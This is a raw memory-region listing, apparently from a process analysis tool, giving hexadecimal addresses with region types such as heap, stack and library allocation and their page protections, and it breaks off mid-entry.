3189000
trusted library allocation
page read and write
30CB000
trusted library allocation
page read and write
783000
trusted library allocation
page read and write
2BA1000
heap
page read and write
20D8000
trusted library allocation
page read and write
4DD000
heap
page read and write
2BC7000
heap
page read and write
8C3000
trusted library allocation
page read and write
2BB0000
heap
page read and write
2BC9000
heap
page read and write
26B5000
trusted library allocation
page read and write
2CF0000
trusted library allocation
page execute
2CA0000
heap
page execute and read and write
4703000
trusted library allocation
page read and write
2B8000
heap
page read and write
3613000
trusted library allocation
page read and write
2D47000
trusted library allocation
page read and write
2CEC000
trusted library allocation
page read and write
3B4000
heap
page read and write
230000
heap
page read and write
2FA000
heap
page read and write
30B2000
trusted library allocation
page read and write
3192000
trusted library allocation
page read and write
6DE000
stack
page read and write
34AC000
trusted library allocation
page read and write
20B8000
trusted library allocation
page read and write
4800000
trusted library allocation
page read and write
E87E000
trusted library allocation
page read and write
3C5000
heap
page read and write
37A0000
heap
page read and write
2E5B000
trusted library allocation
page read and write
30CB000
trusted library allocation
page read and write
2D47000
trusted library allocation
page read and write
46EB000
trusted library allocation
page read and write
2B30000
heap
page read and write
2A50000
heap
page read and write
43E000
heap
page read and write
361F000
trusted library allocation
page read and write
7FF000EA000
trusted library allocation
page execute and read and write
46EB000
trusted library allocation
page read and write
20B1000
trusted library allocation
page read and write
30CB000
trusted library allocation
page read and write
3B4000
heap
page read and write
2B03000
heap
page read and write
9F0000
trusted library allocation
page read and write
20C6000
trusted library allocation
page read and write
2FB0000
heap
page read and write
2633000
trusted library allocation
page read and write
87FE000
trusted library allocation
page read and write
2DB000
heap
page read and write
320D000
trusted library allocation
page read and write
361F000
trusted library allocation
page read and write
30CB000
trusted library allocation
page read and write
CC000
stack
page read and write
8920000
trusted library allocation
page read and write
34F8000
trusted library allocation
page read and write
20D8000
trusted library allocation
page read and write
10000000
unkown
page readonly
426000
heap
page read and write
5F19000
heap
page read and write
12F6C000
trusted library allocation
page read and write
2F9F000
trusted library allocation
page read and write
28A0000
trusted library allocation
page read and write
46F4000
trusted library allocation
page read and write
46F4000
trusted library allocation
page read and write
A30000
heap
page read and write
46F4000
trusted library allocation
page read and write
2644000
trusted library allocation
page read and write
2647000
trusted library allocation
page read and write
20B1000
trusted library allocation
page read and write
23F0000
heap
page read and write
44A000
heap
page read and write
28A0000
trusted library allocation
page read and write
20B8000
trusted library allocation
page read and write
28A0000
trusted library allocation
page read and write
46F4000
trusted library allocation
page read and write
2BB7000
heap
page read and write
3834000
trusted library allocation
page read and write
2D43000
trusted library allocation
page read and write
3267000
trusted library allocation
page read and write
86F000
stack
page read and write
2B76000
heap
page read and write
2649000
trusted library allocation
page read and write
3220000
trusted library allocation
page execute
E87E000
trusted library allocation
page read and write
2094000
trusted library allocation
page read and write
4950000
heap
page read and write
20C6000
trusted library allocation
page read and write
30CB000
trusted library allocation
page read and write
2B2A000
heap
page read and write
E87E000
trusted library allocation
page read and write
20B8000
trusted library allocation
page read and write
20D8000
trusted library allocation
page read and write
30CF000
trusted library allocation
page read and write
2E5D000
trusted library allocation
page read and write
4928000
heap
page read and write
2639000
trusted library allocation
page read and write
3501000
trusted library allocation
page read and write
3501000
trusted library allocation
page read and write
2D48000
trusted library allocation
page read and write
7FF00250000
trusted library allocation
page execute and read and write
3221000
trusted library allocation
page execute
1C98D000
stack
page read and write
3A8000
heap
page read and write
394000
heap
page read and write
38EE000
trusted library allocation
page read and write
2CEC000
trusted library allocation
page read and write
3613000
trusted library allocation
page read and write
36FB000
trusted library allocation
page read and write
46EB000
trusted library allocation
page read and write
30CB000
trusted library allocation
page read and write
7FF0002C000
trusted library allocation
page execute and read and write
2A2E000
stack
page read and write
30CB000
trusted library allocation
page read and write
850E000
trusted library allocation
page read and write
2D20000
trusted library allocation
page read and write
20000
heap
page read and write
2D47000
trusted library allocation
page read and write
34FC000
trusted library allocation
page read and write
2647000
trusted library allocation
page read and write
29A4000
trusted library allocation
page read and write
36F6000
trusted library allocation
page read and write
484000
heap
page read and write
3CFB000
trusted library allocation
page read and write
2400000
heap
page read and write
2643000
trusted library allocation
page read and write
3B56000
trusted library allocation
page read and write
3B0000
heap
page read and write
3501000
trusted library allocation
page read and write
7FF00280000
trusted library allocation
page execute and read and write
30CB000
trusted library allocation
page read and write
7FF00220000
trusted library allocation
page execute and read and write
2648000
trusted library allocation
page read and write
20D8000
trusted library allocation
page read and write
130B1000
trusted library allocation
page read and write
28EE000
stack
page read and write
264F000
trusted library allocation
page read and write
30CB000
trusted library allocation
page read and write
2047000
heap
page read and write
2D47000
trusted library allocation
page read and write
30CB000
trusted library allocation
page read and write
384D000
trusted library allocation
page read and write
2354000
trusted library allocation
page read and write
210000
trusted library allocation
page read and write
280E000
stack
page read and write
960000
heap
page read and write
36C5000
trusted library allocation
page read and write
2C83000
trusted library allocation
page read and write
315E000
stack
page read and write
34FD000
trusted library allocation
page read and write
37B6000
trusted library allocation
page read and write
3501000
trusted library allocation
page read and write
2520000
trusted library allocation
page read and write
31AE000
trusted library allocation
page read and write
2F75000
trusted library allocation
page read and write
363000
trusted library allocation
page read and write
3182000
trusted library allocation
page read and write
2840000
trusted library allocation
page read and write
1005A000
unkown
page readonly
2094000
trusted library allocation
page read and write
46EB000
trusted library allocation
page read and write
3E5000
heap
page read and write
2E53000
trusted library allocation
page read and write
7FF00022000
trusted library allocation
page execute and read and write
784000
trusted library allocation
page read and write
2D35000
trusted library allocation
page read and write
10000
heap
page read and write
40E000
heap
page read and write
8920000
trusted library allocation
page read and write
2647000
trusted library allocation
page read and write
444000
heap
page read and write
800000
heap
page read and write
3280000
trusted library allocation
page read and write
4800000
trusted library allocation
page read and write
2DB000
heap
page read and write
8D0000
heap
page read and write
2E80000
trusted library allocation
page read and write
2B58000
heap
page read and write
2840000
trusted library allocation
page read and write
2633000
trusted library allocation
page read and write
4703000
trusted library allocation
page read and write
34AC000
trusted library allocation
page read and write
2635000
trusted library allocation
page read and write
401000
heap
page read and write
33FD000
trusted library allocation
page read and write
2430000
trusted library allocation
page read and write
263D000
trusted library allocation
page read and write
2D3B000
trusted library allocation
page read and write
3E5000
heap
page read and write
298000
heap
page read and write
390000
trusted library allocation
page read and write
7B2000
heap
page read and write
31EE000
trusted library allocation
page read and write
2BD9000
heap
page read and write
10053000
unkown
page read and write
8FFE000
trusted library allocation
page read and write
10000
heap
page read and write
4914000
heap
page read and write
338000
heap
page read and write
20D8000
trusted library allocation
page read and write
46EB000
trusted library allocation
page read and write
3AC000
heap
page read and write
2BD3000
heap
page read and write
2647000
trusted library allocation
page read and write
4703000
trusted library allocation
page read and write
200000
heap
page read and write
20D8000
trusted library allocation
page read and write
31BE000
stack
page read and write
2B5000
heap
page read and write
3844000
trusted library allocation
page read and write
6B0000
heap
page read and write
8920000
trusted library allocation
page read and write
3627000
trusted library allocation
page read and write
20B1000
trusted library allocation
page read and write
3EB000
heap
page read and write
2D20000
heap
page read and write
2720000
trusted library allocation
page read and write
237000
heap
page read and write
31EE000
trusted library allocation
page read and write
3501000
trusted library allocation
page read and write
3B2000
heap
page read and write
2840000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
34AC000
trusted library allocation
page read and write
20C6000
trusted library allocation
page read and write
3750000
trusted library allocation
page read and write
3F7000
heap
page read and write
3280000
trusted library allocation
page read and write
2BC7000
heap
page read and write
2EBE000
stack
page read and write
4911000
heap
page read and write
20B1000
trusted library allocation
page read and write
739000
heap
page read and write
3627000
trusted library allocation
page read and write
10000000
unkown
page readonly
2B8000
heap
page read and write
25A0000
trusted library allocation
page read and write
20C6000
trusted library allocation
page read and write
2060000
trusted library allocation
page read and write
3C6000
heap
page read and write
743000
trusted library allocation
page read and write
91DE000
trusted library allocation
page read and write
7FF001E7000
trusted library allocation
page read and write
36F6000
trusted library allocation
page read and write
1F60000
heap
page read and write
3AEE000
trusted library allocation
page read and write
1CA70000
heap
page read and write
4965000
heap
page read and write
31EE000
trusted library allocation
page read and write
2064000
trusted library allocation
page read and write
361D000
trusted library allocation
page read and write
3E5000
heap
page read and write
31C3000
trusted library allocation
page read and write
10053000
unkown
page read and write
361D000
trusted library allocation
page read and write
2CEC000
trusted library allocation
page read and write
244D000
stack
page read and write
2D4F000
trusted library allocation
page read and write
3B30000
trusted library allocation
page read and write
7FF00200000
trusted library allocation
page execute and read and write
46EB000
trusted library allocation
page read and write
361D000
trusted library allocation
page read and write
10000
heap
page read and write
836E000
trusted library allocation
page read and write
7FF0024D000
trusted library allocation
page execute and read and write
2BB4000
heap
page read and write
34AC000
trusted library allocation
page read and write
F0000
heap
page read and write
7FF00012000
trusted library allocation
page execute and read and write
2D37000
trusted library allocation
page read and write
2B41000
heap
page read and write
263D000
trusted library allocation
page read and write
2570000
heap
page read and write
20C6000
trusted library allocation
page read and write
7FF001F0000
trusted library allocation
page read and write
3B57000
trusted library allocation
page read and write
E87E000
trusted library allocation
page read and write
20D8000
trusted library allocation
page read and write
4703000
trusted library allocation
page read and write
34AC000
trusted library allocation
page read and write
3FD000
heap
page read and write
364000
trusted library allocation
page read and write
3627000
trusted library allocation
page read and write
36F8000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
3627000
trusted library allocation
page read and write
A14000
trusted library allocation
page read and write
2840000
trusted library allocation
page read and write
300000
heap
page read and write
794000
heap
page read and write
20C6000
trusted library allocation
page read and write
2B7F000
heap
page read and write
2D47000
trusted library allocation
page read and write
2E5B000
trusted library allocation
page read and write
30B7000
trusted library allocation
page read and write
361F000
trusted library allocation
page read and write
2BC5000
heap
page read and write
2B2E000
heap
page read and write
1F8F000
stack
page read and write
4703000
trusted library allocation
page read and write
5F00000
heap
page read and write
2543000
trusted library allocation
page read and write
2D32000
trusted library allocation
page read and write
772000
heap
page read and write
297D000
stack
page read and write
20C6000
trusted library allocation
page read and write
3A9000
heap
page read and write
1F41000
trusted library allocation
page read and write
2743000
trusted library allocation
page read and write
3CF1000
trusted library allocation
page read and write
20B8000
trusted library allocation
page read and write
2AC4000
trusted library allocation
page read and write
2D4A000
trusted library allocation
page read and write
2A50000
remote allocation
page read and write
3879000
trusted library allocation
page read and write
20C6000
trusted library allocation
page read and write
E87E000
trusted library allocation
page read and write
2BA1000
heap
page read and write
34AC000
trusted library allocation
page read and write
2CEC000
trusted library allocation
page read and write
2BC0000
heap
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
3501000
trusted library allocation
page read and write
2840000
trusted library allocation
page read and write
4D0000
heap
page read and write
3A3000
heap
page read and write
2BD9000
heap
page read and write
401000
heap
page read and write
2840000
trusted library allocation
page read and write
4931000
heap
page read and write
2B35000
heap
page read and write
25B0000
trusted library allocation
page read and write
2D47000
trusted library allocation
page read and write
29C000
heap
page read and write
8920000
trusted library allocation
page read and write
426000
heap
page read and write
263B000
trusted library allocation
page read and write
2639000
trusted library allocation
page read and write
2990000
trusted library allocation
page read and write
20D8000
trusted library allocation
page read and write
380000
heap
page read and write
33D000
heap
page read and write
10057000
unkown
page read and write
31EE000
trusted library allocation
page read and write
20D8000
trusted library allocation
page read and write
20B1000
trusted library allocation
page read and write
3627000
trusted library allocation
page read and write
34AC000
trusted library allocation
page read and write
3750000
trusted library allocation
page read and write
2025000
trusted library allocation
page read and write
46EB000
trusted library allocation
page read and write
2062000
trusted library allocation
page read and write
2CE0000
heap
page read and write
42C000
heap
page read and write
3FE000
heap
page read and write
830000
heap
page read and write
3300000
trusted library allocation
page read and write
20D8000
trusted library allocation
page read and write
838E000
trusted library allocation
page read and write
790000
heap
page read and write
34AC000
trusted library allocation
page read and write
3B2000
heap
page read and write
2B76000
heap
page read and write
2647000
trusted library allocation
page read and write
30B0000
trusted library allocation
page read and write
2BC5000
heap
page read and write
2CEC000
trusted library allocation
page read and write
3704000
trusted library allocation
page read and write
3873000
trusted library allocation
page read and write
46F4000
trusted library allocation
page read and write
46F4000
trusted library allocation
page read and write
330000
heap
page read and write
2F7A000
stack
page read and write
20B8000
trusted library allocation
page read and write
3808000
trusted library allocation
page read and write
34AC000
trusted library allocation
page read and write
49E000
heap
page read and write
2CEC000
trusted library allocation
page read and write
7FF001A0000
trusted library allocation
page read and write
2DB000
heap
page read and write
2BCC000
heap
page read and write
46F4000
trusted library allocation
page read and write
37BE000
stack
page read and write
26B5000
trusted library allocation
page read and write
2C5C000
stack
page read and write
20D8000
trusted library allocation
page read and write
300000
heap
page read and write
490D000
heap
page read and write
2B53000
heap
page read and write
318C000
trusted library allocation
page read and write
23E0000
remote allocation
page read and write
3B6000
heap
page read and write
30CB000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
8B0000
heap
page read and write
30A0000
trusted library allocation
page read and write
32EE000
trusted library allocation
page read and write
36FB000
trusted library allocation
page read and write
20B8000
trusted library allocation
page read and write
20000
heap
page read and write
7FF00150000
trusted library allocation
page read and write
2BD3000
heap
page read and write
2D45000
trusted library allocation
page read and write
3501000
trusted library allocation
page read and write
4703000
trusted library allocation
page read and write
3837000
trusted library allocation
page read and write
32BF000
trusted library allocation
page read and write
6F0000
trusted library allocation
page read and write
3023000
trusted library allocation
page read and write
180000
heap
page read and write
2CEC000
trusted library allocation
page read and write
2E5B000
trusted library allocation
page read and write
3EB000
heap
page read and write
3501000
trusted library allocation
page read and write
24AE000
stack
page read and write
32D5000
trusted library allocation
page read and write
1B610000
heap
page read and write
2D49000
trusted library allocation
page read and write
2840000
trusted library allocation
page read and write
23E0000
heap
page read and write
31EE000
trusted library allocation
page read and write
46EB000
trusted library allocation
page read and write
2CEC000
trusted library allocation
page read and write
36F0000
trusted library allocation
page read and write
2647000
trusted library allocation
page read and write
20C6000
trusted library allocation
page read and write
3BA000
heap
page read and write
3B8E000
trusted library allocation
page read and write
2641000
trusted library allocation
page read and write
2D47000
trusted library allocation
page read and write
190000
heap
page read and write
2B1E000
heap
page read and write
2E30000
trusted library allocation
page read and write
20D8000
trusted library allocation
page read and write
7FF001E0000
trusted library allocation
page read and write
20B8000
trusted library allocation
page read and write
4703000
trusted library allocation
page read and write
236000
stack
page read and write
361F000
trusted library allocation
page read and write
46EB000
trusted library allocation
page read and write
2094000
trusted library allocation
page read and write
23F0000
trusted library allocation
page read and write
20B8000
trusted library allocation
page read and write
7FFFFF10000
trusted library allocation
page execute and read and write
2011000
trusted library allocation
page read and write
30B8000
trusted library allocation
page read and write
29C000
heap
page read and write
26B5000
trusted library allocation
page read and write
180000
heap
page read and write
32BB000
trusted library allocation
page read and write
2DD0000
heap
page read and write
2840000
trusted library allocation
page read and write
326E000
trusted library allocation
page read and write
33DE000
trusted library allocation
page read and write
2330000
heap
page read and write
26A5000
trusted library allocation
page read and write
2914000
trusted library allocation
page read and write
1CE0000
trusted library section
page read and write
4703000
trusted library allocation
page read and write
2E83000
trusted library allocation
page read and write
26E000
heap
page read and write
2B3F000
heap
page read and write
2EEE000
stack
page read and write
8FFE000
trusted library allocation
page read and write
2E5D000
trusted library allocation
page read and write
26B5000
trusted library allocation
page read and write
8D8000
heap
page read and write
3A8000
heap
page read and write
10046000
unkown
page readonly
2CEC000
trusted library allocation
page read and write
31DE000
stack
page read and write
401000
heap
page read and write
E87E000
trusted library allocation
page read and write
270000
trusted library allocation
page read and write
34AC000
trusted library allocation
page read and write
2840000
trusted library allocation
page read and write
26B5000
trusted library allocation
page read and write
3FE000
heap
page read and write
4703000
trusted library allocation
page read and write
3B31000
trusted library allocation
page read and write
36F6000
trusted library allocation
page read and write
2B3F000
heap
page read and write
3670000
trusted library allocation
page read and write
202D000
trusted library allocation
page read and write
2BD3000
heap
page read and write
20B1000
trusted library allocation
page read and write
10000
heap
page read and write
8920000
trusted library allocation
page read and write
31C0000
trusted library allocation
page read and write
251C000
stack
page read and write
30CC000
trusted library allocation
page read and write
26A1000
trusted library allocation
page read and write
2E5D000
trusted library allocation
page read and write
42C000
heap
page read and write
29DB000
stack
page read and write
4900000
heap
page read and write
2B46000
heap
page read and write
2F3E000
stack
page read and write | page guard
32D8000
trusted library allocation
page read and write
361D000
trusted library allocation
page read and write
4703000
trusted library allocation
page read and write
3627000
trusted library allocation
page read and write
2094000
trusted library allocation
page read and write
3280000
trusted library allocation
page read and write
264D000
trusted library allocation
page read and write
2E5B000
trusted library allocation
page read and write
2E5B000
trusted library allocation
page read and write
10046000
unkown
page readonly
2B0000
heap
page read and write
850E000
trusted library allocation
page read and write
20C6000
trusted library allocation
page read and write
2D4E000
trusted library allocation
page read and write
20B8000
trusted library allocation
page read and write
2D47000
trusted library allocation
page read and write
263D000
trusted library allocation
page read and write
264A000
trusted library allocation
page read and write
24C000
stack
page read and write
2E5D000
trusted library allocation
page read and write
7FF000E0000
trusted library allocation
page read and write
40B000
heap
page read and write
B2E000
stack
page read and write
8920000
trusted library allocation
page read and write
2353000
trusted library allocation
page read and write
7FF00180000
trusted library allocation
page read and write
46EB000
trusted library allocation
page read and write
263D000
trusted library allocation
page read and write
2D47000
trusted library allocation
page read and write
454000
heap
page read and write
31EE000
trusted library allocation
page read and write
3170000
trusted library allocation
page read and write
34AC000
trusted library allocation
page read and write
30B6000
trusted library allocation
page read and write
91DE000
trusted library allocation
page read and write
1005A000
unkown
page readonly
2AE0000
heap
page read and write
10053000
unkown
page read and write
2840000
trusted library allocation
page read and write
34AC000
trusted library allocation
page read and write
34FF000
trusted library allocation
page read and write
34AC000
trusted library allocation
page read and write
4800000
trusted library allocation
page read and write
2B46000
heap
page read and write
20C6000
trusted library allocation
page read and write
3AD000
heap
page read and write
2D4B000
trusted library allocation
page read and write
2B2A000
heap
page read and write
426000
heap
page read and write
4703000
trusted library allocation
page read and write
30CB000
trusted library allocation
page read and write
2BB0000
heap
page read and write
10046000
unkown
page readonly
32DE000
trusted library allocation
page read and write
3627000
trusted library allocation
page read and write
3730000
trusted library allocation
page read and write
3448000
trusted library allocation
page read and write
2D42000
trusted library allocation
page read and write
20B1000
trusted library allocation
page read and write
2BA1000
heap
page read and write
361D000
trusted library allocation
page read and write
36FB000
trusted library allocation
page read and write
2B5000
heap
page read and write
3A0000
heap
page read and write
2CF3000
heap
page read and write
20C6000
trusted library allocation
page read and write
31EE000
trusted library allocation
page read and write
2B28000
heap
page read and write
100000
heap
page read and write
32A4000
trusted library allocation
page read and write
2B30000
heap
page read and write
2B7A000
heap
page read and write
2A72000
heap
page read and write
30CB000
trusted library allocation
page read and write
4703000
trusted library allocation
page read and write
91DE000
trusted library allocation
page read and write
34FA000
trusted library allocation
page read and write
32E1000
trusted library allocation
page read and write
3709000
trusted library allocation
page read and write
360C000
stack
page read and write
347B000
trusted library allocation
page read and write
E87E000
trusted library allocation
page read and write
2840000
trusted library allocation
page read and write
E87E000
trusted library allocation
page read and write
2094000
trusted library allocation
page read and write
2BD3000
heap
page read and write
3627000
trusted library allocation
page read and write
838E000
trusted library allocation
page read and write
270000
heap
page read and write
34AC000
trusted library allocation
page read and write
3860000
trusted library allocation
page read and write
2E5D000
trusted library allocation
page read and write
361F000
trusted library allocation
page read and write
2D47000
trusted library allocation
page read and write
20D8000
trusted library allocation
page read and write
E87E000
trusted library allocation
page read and write
30CB000
trusted library allocation
page read and write
2F80000
trusted library allocation
page read and write
402000
heap
page read and write
84FE000
trusted library allocation
page read and write
340000
trusted library allocation
page read and write
3285000
trusted library allocation
page read and write
20B8000
trusted library allocation
page read and write
AD000
stack
page read and write
2D47000
trusted library allocation
page read and write
2D30000
trusted library allocation
page read and write
4703000
trusted library allocation
page read and write
891D000
stack
page read and write
2BC7000
heap
page read and write
25B0000
trusted library allocation
page read and write
361D000
trusted library allocation
page read and write
30CB000
trusted library allocation
page read and write
3831000
trusted library allocation
page read and write
366000
heap
page read and write
3F7000
heap
page read and write
4944000
heap
page read and write
84FE000
trusted library allocation
page read and write
36FB000
trusted library allocation
page read and write
2274000
trusted library allocation
page read and write
2D38000
trusted library allocation
page read and write
30CE000
trusted library allocation
page read and write
4D4000
heap
page read and write
28A0000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
1FF8000
trusted library allocation
page read and write
2BBD000
heap
page read and write
2BD3000
heap
page read and write
2BC2000
heap
page read and write
20C6000
trusted library allocation
page read and write
32E0000
trusted library allocation
page read and write
491F000
heap
page read and write
10000000
unkown
page readonly
3450000
trusted library allocation
page read and write
2647000
trusted library allocation
page read and write
1BD0E000
stack
page read and write
3627000
trusted library allocation
page read and write
7D0000
heap
page read and write
2840000
trusted library allocation
page read and write
4703000
trusted library allocation
page read and write
2BC4000
trusted library allocation
page read and write
14B000
heap
page read and write
1D0000
heap
page read and write
6B90000
heap
page read and write
37A000
heap
page read and write
3876000
trusted library allocation
page read and write
20D8000
trusted library allocation
page read and write
2B9C000
stack
page read and write
4703000
trusted library allocation
page read and write
5F02000
heap
page read and write
361F000
trusted library allocation
page read and write
34AC000
trusted library allocation
page read and write
385D000
trusted library allocation
page read and write
371A000
trusted library allocation
page read and write
46F4000
trusted library allocation
page read and write
2A5D000
stack
page read and write
12F45000
trusted library allocation
page read and write
7FF00240000
trusted library allocation
page execute and read and write
69E000
stack
page read and write
20C6000
trusted library allocation
page read and write
8C4000
trusted library allocation
page read and write
367A000
trusted library allocation
page read and write
2B76000
heap
page read and write
2B2A000
heap
page read and write
888C000
stack
page read and write
39A000
heap
page read and write
30AC000
stack
page read and write
31F3000
trusted library allocation
page read and write
30CB000
trusted library allocation
page read and write
30CB000
trusted library allocation
page read and write
1005A000
unkown
page readonly
2094000
trusted library allocation
page read and write
3818000
trusted library allocation
page read and write
34AC000
trusted library allocation
page read and write
26B5000
trusted library allocation
page read and write
3470000
trusted library allocation
page read and write
4703000
trusted library allocation
page read and write
2AF0000
heap
page read and write
2094000
trusted library allocation
page read and write
2640000
trusted library allocation
page read and write
8DDE000
trusted library allocation
page read and write
3E2000
heap
page read and write
300000
trusted library allocation
page read and write
34AC000
trusted library allocation
page read and write
2020000
trusted library allocation
page read and write
171000
stack
page read and write
6B7000
heap
page read and write
20D8000
trusted library allocation
page read and write
2D47000
trusted library allocation
page read and write
7F0000
heap
page read and write
28A0000
trusted library allocation
page read and write
A20000
heap
page read and write
3B7D000
trusted library allocation
page read and write
30B9000
trusted library allocation
page read and write
20D8000
trusted library allocation
page read and write
331A000
trusted library allocation
page read and write
31EE000
trusted library allocation
page read and write
361F000
trusted library allocation
page read and write
2CEC000
trusted library allocation
page read and write
3160000
heap
page read and write
1E0000
trusted library allocation
page read and write
36FB000
trusted library allocation
page read and write
2BA4000
heap
page read and write
23A0000
heap
page read and write
2DA8000
heap
page read and write
34AC000
trusted library allocation
page read and write
361D000
trusted library allocation
page read and write
2D3A000
trusted library allocation
page read and write
29C000
heap
page read and write
4703000
trusted library allocation
page read and write
46F4000
trusted library allocation
page read and write
30B1000
trusted library allocation
page read and write
2094000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
20B1000
trusted library allocation
page read and write
2D31000
trusted library allocation
page read and write
361F000
trusted library allocation
page read and write
2D71000
heap
page read and write
2CAA000
heap
page execute and read and write
E87E000
trusted library allocation
page read and write
9B000
stack
page read and write
22D0000
heap
page read and write
2CEC000
trusted library allocation
page read and write
3461000
trusted library allocation
page read and write
2630000
trusted library allocation
page read and write
2647000
trusted library allocation
page read and write
3280000
trusted library allocation
page read and write
34AC000
trusted library allocation
page read and write
3222000
trusted library allocation
page read and write
3847000
trusted library allocation
page read and write
20C6000
trusted library allocation
page read and write
7FF000D0000
trusted library allocation
page read and write
2E5B000
trusted library allocation
page read and write
2CEC000
trusted library allocation
page read and write
7FF000D2000
trusted library allocation
page execute and read and write
1BF6000
heap
page read and write
2CE0000
heap
page execute and read and write
246C000
stack
page read and write
26B5000
trusted library allocation
page read and write
2840000
trusted library allocation
page read and write
2A54000
heap
page read and write
2E5D000
trusted library allocation
page read and write
2E5D000
trusted library allocation
page read and write
71A000
heap
page read and write
29A0000
trusted library allocation
page read and write
2CB000
heap
page read and write
2BA0000
trusted library allocation
page read and write
31EE000
trusted library allocation
page read and write
87FE000
trusted library allocation
page read and write
1CA83000
heap
page read and write
31B1000
trusted library allocation
page read and write
4914000
heap
page read and write
7FF001B0000
trusted library allocation
page execute and read and write
4703000
trusted library allocation
page read and write
34F0000
trusted library allocation
page read and write
2A90000
trusted library allocation
page read and write
267000
heap
page read and write
31F4000
trusted library allocation
page read and write
30CB000
trusted library allocation
page read and write
30BB000
trusted library allocation
page read and write
32EB000
trusted library allocation
page read and write
E87E000
trusted library allocation
page read and write
7FF001D0000
trusted library allocation
page execute and read and write
2544000
trusted library allocation
page read and write
31C8000
trusted library allocation
page read and write
31D000
heap
page read and write
3224000
trusted library allocation
page execute
31C4000
trusted library allocation
page read and write
2B76000
heap
page read and write
2B56000
heap
page read and write
8920000
trusted library allocation
page read and write
2DA0000
heap
page read and write
42C000
heap
page read and write
2414000
trusted library allocation
page read and write
3750000
trusted library allocation
page read and write
2D47000
trusted library allocation
page read and write
2D4C000
trusted library allocation
page read and write
46F4000
trusted library allocation
page read and write
429000
heap
page read and write
22D5000
heap
page read and write
327C000
trusted library allocation
page read and write
23E0000
heap
page read and write
87FE000
trusted library allocation
page read and write
263D000
trusted library allocation
page read and write
341A000
trusted library allocation
page read and write
34FE000
trusted library allocation
page read and write
20D8000
trusted library allocation
page read and write
46F4000
trusted library allocation
page read and write
31A1000
trusted library allocation
page read and write
36D2000
trusted library allocation
page read and write
89EE000
trusted library allocation
page read and write
5F03000
heap
page read and write
7FF00290000
trusted library allocation
page execute and read and write
2410000
trusted library allocation
page read and write
2840000
trusted library allocation
page read and write
7FF00160000
trusted library allocation
page execute and read and write
3280000
trusted library allocation
page read and write
30CD000
trusted library allocation
page read and write
2DC5000
heap
page read and write
10000
heap
page read and write
46F4000
trusted library allocation
page read and write
46F4000
trusted library allocation
page read and write
1D00000
trusted library allocation
page read and write
2A90000
trusted library allocation
page read and write
2A2E000
stack
page read and write
401000
heap
page read and write
27AE000
stack
page read and write
495D000
heap
page read and write
250000
heap
page read and write
30A0000
trusted library allocation
page read and write
2647000
trusted library allocation
page read and write
2BBD000
heap
page read and write
131F2000
trusted library allocation
page read and write
302E000
stack
page read and write
32DB000
trusted library allocation
page read and write
3B7000
heap
page read and write
2639000
trusted library allocation
page read and write
2BA1000
heap
page read and write
234000
trusted library allocation
page read and write
46EB000
trusted library allocation
page read and write
3000000
trusted library allocation
page read and write
6D4000
heap
page read and write
3718000
trusted library allocation
page read and write
2BB4000
heap
page read and write
2BC5000
heap
page read and write
13D000
heap
page read and write
720000
trusted library allocation
page read and write
4922000
heap
page read and write
3B6000
heap
page read and write
E87E000
trusted library allocation
page read and write
3B6000
heap
page read and write
4703000
trusted library allocation
page read and write
264B000
trusted library allocation
page read and write
203000
trusted library allocation
page read and write
2B18000
heap
page read and write
5F08000
heap
page read and write
2AA0000
trusted library allocation
page read and write
20D8000
trusted library allocation
page read and write
20D8000
trusted library allocation
page read and write
33D9000
trusted library allocation
page read and write
4703000
trusted library allocation
page read and write
3FE000
heap
page read and write
34E8000
trusted library allocation
page read and write
836E000
trusted library allocation
page read and write
276000
heap
page read and write
2840000
trusted library allocation
page read and write
E87E000
trusted library allocation
page read and write
31EE000
trusted library allocation
page read and write
3290000
trusted library allocation
page read and write
13051000
trusted library allocation
page read and write
20B1000
trusted library allocation
page read and write
2BE0000
heap
page read and write
2840000
trusted library allocation
page read and write
348000
heap
page read and write
30B4000
trusted library allocation
page read and write
3260000
heap
page read and write
2B26000
heap
page read and write
316C000
trusted library allocation
page read and write
2F41000
trusted library allocation
page read and write
2BCC000
heap
page read and write
13190000
trusted library allocation
page read and write
2B03000
heap
page read and write
263D000
trusted library allocation
page read and write
29AA000
trusted library allocation
page read and write
3263000
trusted library allocation
page read and write
3735000
trusted library allocation
page read and write
3263000
stack
page read and write
31EE000
trusted library allocation
page read and write
3A0000
heap
page read and write
20B1000
trusted library allocation
page read and write
440000
heap
page read and write
2CEC000
trusted library allocation
page read and write
3503000
trusted library allocation
page read and write
329000
heap
page read and write
20B8000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
2D43000
trusted library allocation
page read and write
2B56000
heap
page read and write
2B36000
heap
page read and write
2BD9000
heap
page read and write
3B3000
heap
page read and write
46F4000
trusted library allocation
page read and write
34F5000
trusted library allocation
page read and write
34AC000
trusted library allocation
page read and write
490D000
heap
page read and write
170000
heap
page read and write
3223000
trusted library allocation
page execute
46F4000
trusted library allocation
page read and write
32FD000
trusted library allocation
page read and write
289E000
stack
page read and write
10053000
unkown
page read and write
3B7000
heap
page read and write
31D0000
trusted library allocation
page read and write
10057000
unkown
page read and write
235000
stack
page read and write | page guard
3501000
trusted library allocation
page read and write
2CEC000
trusted library allocation
page read and write
3501000
trusted library allocation
page read and write
34AC000
trusted library allocation
page read and write
91DE000
trusted library allocation
page read and write
34F6000
trusted library allocation
page read and write
2D41000
trusted library allocation
page read and write
7D0000
heap
page read and write
30C4000
trusted library allocation
page read and write
3863000
trusted library allocation
page read and write
4703000
trusted library allocation
page read and write
3E2000
heap
page read and write
2BC3000
trusted library allocation
page read and write
2840000
trusted library allocation
page read and write
7FF001C0000
trusted library allocation
page read and write
2B2C000
heap
page read and write
3A4000
heap
page read and write
2840000
trusted library allocation
page read and write
2F3F000
stack
page read and write
2C60000
trusted library allocation
page read and write
4703000
trusted library allocation
page read and write
263D000
trusted library allocation
page read and write
2D47000
trusted library allocation
page read and write
26B5000
trusted library allocation
page read and write
46F4000
trusted library allocation
page read and write
970000
heap
page read and write
2CEC000
trusted library allocation
page read and write
20B1000
trusted library allocation
page read and write
46EB000
trusted library allocation
page read and write
2040000
heap
page read and write
2637000
trusted library allocation
page read and write
361D000
trusted library allocation
page read and write
3FF000
heap
page read and write
49A000
heap
page read and write
8920000
trusted library allocation
page read and write
3FE000
heap
page read and write
34AA000
